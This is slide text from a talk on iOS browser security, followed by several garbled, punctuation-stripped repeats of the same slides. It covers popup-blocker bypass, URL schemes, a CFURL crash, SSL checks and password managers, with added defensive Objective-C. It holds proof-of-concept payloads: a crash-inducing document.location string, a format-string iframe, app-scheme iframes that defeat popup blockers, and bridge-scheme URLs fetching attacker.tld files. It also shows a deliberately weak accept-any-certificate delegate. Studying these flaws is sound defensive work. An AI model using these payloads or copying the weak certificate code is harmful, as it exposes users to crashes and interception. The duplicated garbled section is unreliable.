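static NSString *const kBridgeScheme = @"mybrowser";   // assumption

@interface BrowserViewController : UIViewController <UIWebViewDelegate>
- (void)startDownloadOfURL:(NSURL *)url;               // hypothetical
- (void)confirmOpeningExternalURL:(NSURL *)url;        // hypothetical
@end

@implementation BrowserViewController

- (BOOL)webView:(UIWebView *)webView
        shouldStartLoadWithRequest:(NSURLRequest *)request
        navigationType:(UIWebViewNavigationType)navigationType {
    NSURL *url = request.URL;
    if (url == nil) { return NO; }        // unparsable URL: never pass nil on

    NSString *scheme = url.scheme.lowercaseString;
    // The delegate is called for subframe loads as well; comparing against
    // mainDocumentURL tells top-level navigations from <iframe> loads.
    BOOL isMainFrame = [url isEqual:request.mainDocumentURL];
    // navigationType is a hint only: a script can dispatch a synthetic click
    // on an <a> element, so this alone is not proof of a user gesture.
    BOOL userInitiated = (navigationType == UIWebViewNavigationTypeLinkClicked);

    // Native (WebKit) schemes: let WebKit load them.
    if ([scheme isEqualToString:@"http"]  || [scheme isEqualToString:@"https"] ||
        [scheme isEqualToString:@"about"] || [scheme isEqualToString:@"data"]) {
        return YES;
    }

    // Bridge (internal) scheme: reachable by any web page, so it must act
    // only on user-initiated, top-frame navigations and validate arguments.
    if ([scheme isEqualToString:kBridgeScheme]) {
        if (isMainFrame && userInitiated && [url.host isEqualToString:@"download"]) {
            NSURL *target = [NSURL URLWithString:url.query ?: @""];
            NSString *targetScheme = target.scheme.lowercaseString;
            if ([targetScheme isEqualToString:@"http"] ||
                [targetScheme isEqualToString:@"https"]) {
                [self startDownloadOfURL:target];
            }
        }
        return NO;   // a bridge URL is a command, never content to render
    }

    // Registered (external) and application schemes (googlechrome://,
    // merc://, tel:, ...): an <iframe src="merc://..."> is a non-user-initiated
    // subframe load and is dropped here. A tapped top-frame link may leave
    // the browser, but only after the user has confirmed the hand-off.
    if (isMainFrame && userInitiated &&
        [[UIApplication sharedApplication] canOpenURL:url]) {
        [self confirmOpeningExternalURL:url];
    }
    return NO;
}

@end
```

Two points the delegate cannot fix on its own: a downloaded file such as the README.html on the slide must afterwards be displayed with the precautions from the "Opening local HTML files safely" slide, and a download of an authenticated resource (the victim/data example) should not reuse the browsing session's cookies unless the user asked for that download.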
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://% , http://%5 , http://%5c etc.
• Example (Opera Coast): <script>document.location = 'http://%5c'</script>

Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
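The same failure reproduced at the CoreFoundation layer, with the check that prevents it. This is an added example, not code from the presentation or from Opera Coast; it uses only Foundation/CoreFoundation, and the sample inputs are the ones listed on the slide.

```objectivec
// Added example, not code from the presentation. A URL string that does not
// parse yields NULL, and any CFURL function called on that NULL dereferences
// address 0. Plain Foundation/CoreFoundation only; inputs are the slide's.
#import <Foundation/Foundation.h>
#import <CoreFoundation/CoreFoundation.h>

// Returns the path component of urlString, or nil when the string is not a
// URL. The NULL check is the whole fix: without it CFURLCopyPath(NULL) is the
// EXC_BAD_ACCESS at 0x00000000 shown in the Opera Coast backtrace.
static NSString *PathOfURLString(NSString *urlString) {
    CFURLRef url = CFURLCreateWithString(kCFAllocatorDefault,
                                         (__bridge CFStringRef)urlString, NULL);
    if (url == NULL) {
        return nil;                          // reject; do not touch CFURL further
    }
    CFStringRef path = CFURLCopyPath(url);   // safe: url is non-NULL here
    CFRelease(url);
    if (path == NULL) {
        return @"";                          // valid URL without a path
    }
    return CFBridgingRelease(path);
}

int main(int argc, const char *argv[]) {
    @autoreleasepool {
        // Inputs from the slide plus one well-formed control. Which of the
        // malformed strings CFURLCreateWithString rejects can differ between
        // CoreFoundation versions; the point is that the caller checks.
        NSArray *inputs = @[@"http://example.com/a/b",
                            @"http://%", @"http://%5", @"http://%5c"];
        for (NSString *s in inputs) {
            NSString *path = PathOfURLString(s);
            NSLog(@"%@ -> %@", s, path ?: @"(rejected: not a URL)");
        }
        // Same rule one layer up: +[NSURL URLWithString:] returns nil for such
        // input, and a nil NSURL must be checked before it reaches CF code.
        NSURL *nsurl = [NSURL URLWithString:@"http://%"];
        NSLog(@"NSURL for http://%% is %@", nsurl ? @"non-nil" : @"nil");
    }
    return 0;
}
```

A browser that takes the string from document.location (as in the slide's one-line proof of concept), from the address bar, or from a bridge-scheme parameter must apply this check at the first parse; a NULL that escapes into the rest of the URL handling code is a crash waiting for the next CFURL call.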
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
  <iframe src="lets-try-format-string://%p%p%p%p…">
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 1/4 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02), so frames and subresources from other hosts are not checked
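What "silently accepted" and "main domain only" look like in code, next to a hardened handler. This is an added example, not code from the presentation or from any tested browser. It assumes the browser answers NSURLAuthenticationMethodServerTrust challenges itself (e.g. from an NSURLProtocol that drives NSURLConnection), and the per-host exception store acceptedLeafByHost is an assumed app-level structure.

```objectivec
// Added example, not code from the presentation or from any tested browser.
// Two NSURLConnection delegates: the weak pattern and a hardened one. The
// exception store (acceptedLeafByHost) is an assumption.
#import <Foundation/Foundation.h>
#import <Security/Security.h>

// WEAK: answers every server-trust challenge with the server's own
// certificate, so a self-signed or forged certificate is silently accepted.
@interface AcceptAnythingDelegate : NSObject <NSURLConnectionDelegate>
@end
@implementation AcceptAnythingDelegate
- (void)connection:(NSURLConnection *)connection
        willSendRequestForAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge {
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if ([space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        [challenge.sender useCredential:[NSURLCredential credentialForTrust:space.serverTrust]
             forAuthenticationChallenge:challenge];
        return;
    }
    [challenge.sender performDefaultHandlingForAuthenticationChallenge:challenge];
}
@end

// HARDENED: evaluates the chain for the host of *this* challenge, which also
// covers frames and subresources from hosts other than the main document's,
// and honours only an exception the user accepted for exactly this host and
// exactly this leaf certificate.
@interface HardenedTrustDelegate : NSObject <NSURLConnectionDelegate>
// host -> DER bytes of the leaf certificate the user accepted (assumed store)
@property (nonatomic, strong) NSMutableDictionary *acceptedLeafByHost;
@end
@implementation HardenedTrustDelegate
- (void)connection:(NSURLConnection *)connection
        willSendRequestForAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge {
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if (![space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        [challenge.sender performDefaultHandlingForAuthenticationChallenge:challenge];
        return;
    }
    SecTrustRef trust = space.serverTrust;
    SecTrustResultType result = kSecTrustResultInvalid;
    BOOL chainOK = (SecTrustEvaluate(trust, &result) == errSecSuccess) &&
                   (result == kSecTrustResultUnspecified || result == kSecTrustResultProceed);
    if (!chainOK) {
        // Chain failed: allow only a previously accepted leaf for this host.
        NSData *leaf = nil;
        if (SecTrustGetCertificateCount(trust) > 0) {
            leaf = CFBridgingRelease(SecCertificateCopyData(SecTrustGetCertificateAtIndex(trust, 0)));
        }
        NSData *accepted = self.acceptedLeafByHost[space.host];
        chainOK = (leaf != nil && accepted != nil && [leaf isEqualToData:accepted]);
    }
    if (chainOK) {
        [challenge.sender useCredential:[NSURLCredential credentialForTrust:trust]
             forAuthenticationChallenge:challenge];
    } else {
        // Fail closed. The UI may now offer to add an exception for space.host;
        // the user must see the host name and certificate before accepting.
        [challenge.sender cancelAuthenticationChallenge:challenge];
    }
}
@end
```

The "main domain only" bug is the case where the hardened logic runs for the address-bar host but some other code path (a second connection class, a download manager, a frame loader) still uses the first delegate; every connection the browser opens has to go through the same trust decision.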
Password managers
• Injected JavaScript runs with the privileges of the top frame → passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain but not always the URL scheme (https vs http)
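The two decisions a browser's password manager has to get right, saving and filling, as an added example that is not code from the presentation or from any tested browser. It uses plain Foundation; the credential store itself is assumed and credentials are keyed by full origin (scheme, host, port).

```objectivec
// Added example, not code from the presentation or from any tested browser.
// Save-and-fill decisions of a password manager, keyed by full origin.
// Plain Foundation only; the credential store is assumed.
#import <Foundation/Foundation.h>

// scheme://host:port for http(s) URLs, nil for anything else.
static NSString *OriginOfURL(NSURL *url) {
    NSString *scheme = url.scheme.lowercaseString;
    if (!url.host ||
        !([scheme isEqualToString:@"https"] || [scheme isEqualToString:@"http"])) {
        return nil;
    }
    NSNumber *port = url.port ?: ([scheme isEqualToString:@"https"] ? @443 : @80);
    return [NSString stringWithFormat:@"%@://%@:%@",
            scheme, url.host.lowercaseString, port];
}

// Origin under which a credential is saved: the origin of the *main document*
// that showed the login form, taken from the request the web view reported,
// never from a value the page supplies (that is how "save for another domain"
// attacks work).
static NSString *OriginToSaveFor(NSURLRequest *formSubmission) {
    return OriginOfURL(formSubmission.mainDocumentURL);
}

// YES only if the credential saved under savedOrigin may be filled into the
// document the web view currently shows (request = its main-document request).
static BOOL MayAutofill(NSString *savedOrigin, NSURLRequest *request) {
    // Injected JS has only the top frame's privileges and cannot see a
    // cross-origin subframe's URL, so nothing is ever filled into subframes.
    if (![request.URL isEqual:request.mainDocumentURL]) { return NO; }
    NSString *current = OriginOfURL(request.mainDocumentURL);
    // Full-origin match: https://bank.example:443 is not http://bank.example:80,
    // so a credential captured over TLS never reaches a plaintext page into
    // which a network attacker could have injected a form.
    return current != nil && [current isEqualToString:savedOrigin];
}

// WebKit fills in mainDocumentURL on the requests it hands to the delegate;
// this helper mimics that for the constructed sample requests below.
static NSURLRequest *RequestFor(NSString *url, NSString *mainDocument) {
    NSMutableURLRequest *r = [NSMutableURLRequest requestWithURL:[NSURL URLWithString:url]];
    r.mainDocumentURL = [NSURL URLWithString:mainDocument];
    return r;
}

int main(int argc, const char *argv[]) {
    @autoreleasepool {
        NSString *saved = OriginToSaveFor(
            RequestFor(@"https://bank.example/login", @"https://bank.example/login"));
        NSLog(@"saved under %@", saved);
        NSLog(@"fill into http page:  %d", MayAutofill(saved,
            RequestFor(@"http://bank.example/login", @"http://bank.example/login")));
        NSLog(@"fill into https page: %d", MayAutofill(saved,
            RequestFor(@"https://bank.example/account", @"https://bank.example/account")));
        NSLog(@"fill into subframe:   %d", MayAutofill(saved,
            RequestFor(@"https://bank.example/frame", @"https://attacker.example/")));
    }
    return 0;
}
```

Keying on the full origin is what closes the https-vs-http gap on the slide; the subframe refusal is the flip side of the first bullet, since a top-frame script cannot tell which origin a cross-site frame belongs to, let alone fill it safely.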
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?

lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter: @runicpl, @h0wlu

Thank you
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
